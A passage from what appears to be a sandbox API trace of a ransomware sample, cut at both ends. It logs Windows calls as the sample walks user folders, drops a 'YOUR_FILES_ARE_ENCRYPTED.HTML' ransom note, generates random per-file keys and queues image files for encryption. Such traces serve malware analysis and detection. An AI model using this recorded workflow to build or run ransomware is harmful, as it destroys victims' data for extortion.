ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad545d50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0168.130] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad545d50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad545d50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad545d50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0168.130] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xad545d50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad545d50, ftLastAccessTime.dwHighDateTime=0x1d709b9, 
ftLastWriteTime.dwLowDateTime=0xad545d50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x65, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0168.130] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive\\desktop.ini") returned 44 [0168.130] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.130] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0168.130] lstrlenW (lpString=".ini") returned 4 [0168.130] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0168.130] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xad545d50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad545d50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad545d50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x65, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0168.131] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0168.131] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0168.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\onedrive\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0168.131] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, 
lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0168.133] CloseHandle (hObject=0x5a0) returned 1 [0168.133] GetProcessHeap () returned 0x270000 [0168.134] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.134] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaeae5b00, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaeae5b00, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Pictures", cAlternateFileName="")) returned 1 [0168.134] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures") returned 32 [0168.134] GetProcessHeap () returned 0x270000 [0168.134] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.135] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures" [0168.135] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\*" [0168.135] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaeae5b00, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaeae5b00, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, 
cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0168.135] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaeae5b00, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaeae5b00, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0168.135] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4845ecd0, ftCreationTime.dwHighDateTime=0x1d7e4d8, ftLastAccessTime.dwLowDateTime=0xfca1610, ftLastAccessTime.dwHighDateTime=0x1d7e749, ftLastWriteTime.dwLowDateTime=0xfca1610, ftLastWriteTime.dwHighDateTime=0x1d7e749, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="-qapdyt.gif", cAlternateFileName="")) returned 1 [0168.135] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\-qapdyt.gif") returned 44 [0168.135] lstrcmpW (lpString1="-qapdyt.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.135] PathFindExtensionW (pszPath="-qapdyt.gif") returned=".gif" [0168.135] lstrlenW (lpString=".gif") returned 4 [0168.135] PathFindExtensionW (pszPath="-qapdyt.gif") returned=".gif" [0168.135] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\-qapdyt.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\-qapdyt.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0168.136] 
GetFileSizeEx (in: hFile=0x304, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=19456) returned 1 [0168.136] GetProcessHeap () returned 0x270000 [0168.136] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7472318 [0168.139] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="5F") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="C2") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="E5") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="95") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="C2") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="73") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="A6") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="9C") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="2B") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="C3") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="DE") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="01") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="0C") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="CA") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="66") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="5E") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="C1") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="7C") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="10") returned 2 [0168.139] 
wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="C2") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="2C") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="5E") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="70") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="A7") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="F5") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="B9") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="24") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="F4") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="03") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="59") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="FE") returned 2 [0168.140] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="25") returned 2 [0168.140] lstrcpyW (in: lpString1=0x74823cc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\-qapdyt.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\-qapdyt.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\-qapdyt.gif" [0168.140] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x3a0, CompletionKey=0x7472318, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.140] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7472318, lpOverlapped=0x7472318) returned 1 [0168.140] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdee6c6e0, ftCreationTime.dwHighDateTime=0x1d7d86d, ftLastAccessTime.dwLowDateTime=0x98fb29c0, 
ftLastAccessTime.dwHighDateTime=0x1d7e761, ftLastWriteTime.dwLowDateTime=0x98fb29c0, ftLastWriteTime.dwHighDateTime=0x1d7e761, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="C1jO8j6", cAlternateFileName="")) returned 1 [0168.140] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6") returned 40 [0168.140] GetProcessHeap () returned 0x270000 [0168.140] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0168.140] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6" [0168.140] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\*" [0168.140] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdee6c6e0, ftCreationTime.dwHighDateTime=0x1d7d86d, ftLastAccessTime.dwLowDateTime=0x98fb29c0, ftLastAccessTime.dwHighDateTime=0x1d7e761, ftLastWriteTime.dwLowDateTime=0x98fb29c0, ftLastWriteTime.dwHighDateTime=0x1d7e761, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb916d8, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0168.141] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdee6c6e0, ftCreationTime.dwHighDateTime=0x1d7d86d, ftLastAccessTime.dwLowDateTime=0x98fb29c0, ftLastAccessTime.dwHighDateTime=0x1d7e761, ftLastWriteTime.dwLowDateTime=0x98fb29c0, ftLastWriteTime.dwHighDateTime=0x1d7e761, nFileSizeHigh=0x0, 
nFileSizeLow=0x0, dwReserved0=0xb916d8, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.141] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe85f4260, ftCreationTime.dwHighDateTime=0x1d7da43, ftLastAccessTime.dwLowDateTime=0x9a1477d0, ftLastAccessTime.dwHighDateTime=0x1d7dbc2, ftLastWriteTime.dwLowDateTime=0x9a1477d0, ftLastWriteTime.dwHighDateTime=0x1d7dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb916d8, dwReserved1=0x0, cFileName="2 Kw", cAlternateFileName="2KW~1")) returned 1 [0168.141] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw") returned 45 [0168.141] GetProcessHeap () returned 0x270000 [0168.141] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76302f8 [0168.141] lstrcpyW (in: lpString1=0x76302f8, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw" [0168.141] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\*" [0168.142] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe85f4260, ftCreationTime.dwHighDateTime=0x1d7da43, ftLastAccessTime.dwLowDateTime=0x9a1477d0, ftLastAccessTime.dwHighDateTime=0x1d7dbc2, ftLastWriteTime.dwLowDateTime=0x9a1477d0, ftLastWriteTime.dwHighDateTime=0x1d7dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 
[0168.142] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe85f4260, ftCreationTime.dwHighDateTime=0x1d7da43, ftLastAccessTime.dwLowDateTime=0x9a1477d0, ftLastAccessTime.dwHighDateTime=0x1d7dbc2, ftLastWriteTime.dwLowDateTime=0x9a1477d0, ftLastWriteTime.dwHighDateTime=0x1d7dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0168.142] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34730d70, ftCreationTime.dwHighDateTime=0x1d7e080, ftLastAccessTime.dwLowDateTime=0xc3d59670, ftLastAccessTime.dwHighDateTime=0x1d7e096, ftLastWriteTime.dwLowDateTime=0xc3d59670, ftLastWriteTime.dwHighDateTime=0x1d7e096, nFileSizeHigh=0x0, nFileSizeLow=0xffe1, dwReserved0=0x0, dwReserved1=0x60, cFileName="1ZWvVhvziyMt_nXcJ.gif", cAlternateFileName="1ZWVVH~1.GIF")) returned 1 [0168.142] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\1ZWvVhvziyMt_nXcJ.gif") returned 67 [0168.142] lstrcmpW (lpString1="1ZWvVhvziyMt_nXcJ.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.142] PathFindExtensionW (pszPath="1ZWvVhvziyMt_nXcJ.gif") returned=".gif" [0168.142] lstrlenW (lpString=".gif") returned 4 [0168.142] PathFindExtensionW (pszPath="1ZWvVhvziyMt_nXcJ.gif") returned=".gif" [0168.142] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\1ZWvVhvziyMt_nXcJ.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\1zwvvhvziymt_nxcj.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e0 [0168.143] GetFileSizeEx (in: hFile=0x5e0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=65505) returned 1 [0168.143] GetProcessHeap () returned 0x270000 [0168.143] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7640300 [0168.146] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="43") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="58") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="38") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="30") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="60") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="25") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="C6") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="49") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="E1") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="6E") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="E1") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="F3") returned 2 [0168.146] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="88") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="F3") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="36") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="5E") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="67") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="0F") returned 2 [0168.147] wsprintfW (in: 
param_1=0x4ebd772, param_2="%02X" | out: param_1="43") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="8E") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="BF") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="AA") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="C2") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="8B") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="BC") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="4E") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="A4") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="A2") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="F0") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="49") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="90") returned 2 [0168.147] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="60") returned 2 [0168.148] lstrcpyW (in: lpString1=0x76503b4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\1ZWvVhvziyMt_nXcJ.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\1ZWvVhvziyMt_nXcJ.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\1ZWvVhvziyMt_nXcJ.gif" [0168.148] CreateIoCompletionPort (FileHandle=0x5e0, ExistingCompletionPort=0x3a0, CompletionKey=0x7640300, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.148] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7640300, lpOverlapped=0x7640300) returned 1 [0168.148] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 
lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd562240, ftCreationTime.dwHighDateTime=0x1d7ddcc, ftLastAccessTime.dwLowDateTime=0x8992cf0, ftLastAccessTime.dwHighDateTime=0x1d7e4ec, ftLastWriteTime.dwLowDateTime=0x8992cf0, ftLastWriteTime.dwHighDateTime=0x1d7e4ec, nFileSizeHigh=0x0, nFileSizeLow=0x146fc, dwReserved0=0x0, dwReserved1=0x60, cFileName="aITse3WKP.png", cAlternateFileName="AITSE3~1.PNG")) returned 1 [0168.148] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\aITse3WKP.png") returned 59 [0168.148] lstrcmpW (lpString1="aITse3WKP.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.148] PathFindExtensionW (pszPath="aITse3WKP.png") returned=".png" [0168.148] lstrlenW (lpString=".png") returned 4 [0168.148] PathFindExtensionW (pszPath="aITse3WKP.png") returned=".png" [0168.148] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\aITse3WKP.png" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\2 kw\\aitse3wkp.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5dc [0168.149] GetFileSizeEx (in: hFile=0x5dc, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=83708) returned 1 [0168.149] GetProcessHeap () returned 0x270000 [0168.149] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x750a170 [0168.152] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="62") returned 2 [0168.152] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="8B") returned 2 [0168.152] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="DA") returned 2 [0168.152] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: 
param_1="D8") returned 2 [0168.152] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="56") returned 2 [0168.152] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="07") returned 2 [0168.152] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="FA") returned 2 [0168.152] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="D7") returned 2 [0168.152] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="3A") returned 2 [0168.152] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="09") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="79") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="FC") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="F1") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="F5") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="B2") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="CD") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="D5") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="6F") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="09") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="A3") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="CB") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="10") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="FD") returned 2 [0168.153] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="19") returned 2 [0168.153] wsprintfW (in: 